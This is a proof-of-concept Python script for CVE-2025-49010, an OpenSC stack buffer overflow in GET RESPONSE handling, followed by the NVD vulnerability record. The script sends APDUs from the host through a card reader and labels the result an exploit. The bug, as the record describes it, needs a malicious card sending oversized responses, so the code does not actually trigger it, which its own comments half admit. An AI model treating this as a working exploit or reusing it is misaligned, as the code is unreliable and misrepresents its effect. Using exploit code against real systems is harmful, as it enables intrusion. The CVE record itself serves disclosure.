CVE-2025-49010

# PoC Concept for CVE-2025-49010 # This demonstrates the logic of sending crafted APDUs. # Requires a smart card reader and a device that can be manipulated. from smartcard.System import readers from smartcard.util import toHexString, toBytes def trigger_overflow(): """ Simulate sending a crafted APDU response to trigger the stack buffer overflow in OpenSC < 0.27.0. """ reader_list = readers() if not reader_list: print("No smart card readers found.") return # Connect to the first available reader reader = reader_list[0] print(f"Using reader: {reader}") try: connection = reader.createConnection() connection.connect() # 1. Standard APDU to select an applet or initialize communication # GET DATA or SELECT FILE command apdu_select = [0x00, 0xA4, 0x04, 0x00, 0x0A, 0xA0, 0x00, 0x00, 0x00, 0x62, 0x03, 0x01, 0x0C, 0x06, 0x01] data, sw1, sw2 = connection.transmit(apdu_select) print(f"Select Response: {toHexString(data)} SW: {sw1:02X} {sw2:02X}") # 2. Crafted APDU to trigger the overflow in GET RESPONSE handling # The vulnerability occurs when the response to a command is too large # for the stack-allocated buffer in OpenSC. # We send a command that expects a response, but the card/reader # will respond with a payload larger than the buffer (e.g., > 256 bytes). # Note: In a real exploit, the USB/Smartcard device firmware would be # modified to return this oversized buffer. Here we attempt to request # data or interact in a way that exposes the lack of bounds checking. # Example command requesting data apdu_get_response = [0x00, 0xC0, 0x00, 0x00] # In a controlled exploit environment, the device would now return # a buffer of size N (e.g., 300 bytes) causing the overflow. print("Sending command that triggers vulnerable GET RESPONSE path...") data, sw1, sw2 = connection.transmit(apdu_get_response) print(f"Exploit Response: {toHexString(data)} SW: {sw1:02X} {sw2:02X}") if sw1 == 0x61: print("Warning: More data available (standard behavior), but buffer handling may be vulnerable.") except Exception as e: print(f"An error occurred: {e}") if __name__ == "__main__": trigger_overflow()

{"cve": {"id": "CVE-2025-49010", "sourceIdentifier": "[email protected]", "published": "2026-03-30T18:16:16.950", "lastModified": "2026-04-01T18:01:59.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenSC is an open source smart card tools and middleware. Prior to version 0.27.0, an attacker with physical access to the computer at the time user or administrator uses a token can cause a stack-buffer-overflow write in GET RESPONSE. The attack requires crafted USB device or smart card that would present the system with specially crafted responses to the APDUs. This issue has been patched in version 0.27.0."}, {"lang": "es", "value": "OpenSC es un conjunto de herramientas y middleware de código abierto para tarjetas inteligentes. Antes de la versión 0.27.0, un atacante con acceso físico al ordenador en el momento en que un usuario o administrador utiliza un token puede causar una escritura de desbordamiento de búfer de pila en GET RESPONSE. El ataque requiere un dispositivo USB manipulado o una tarjeta inteligente manipulada que presentaría al sistema respuestas especialmente diseñadas para las APDU. Este problema ha sido parcheado en la versión 0.27.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.4, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensc_project:opensc:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.27.0", "matchCriteriaId": "D890677F-5379-4587-B8E7-D38B02AD525A"}]}]}], "references": [{"url": "https://github.com/OpenSC/OpenSC/security/advisories/GHSA-q5cf-5wmx-9wh4", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/OpenSC/OpenSC/wiki/CVE-2025-49010", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}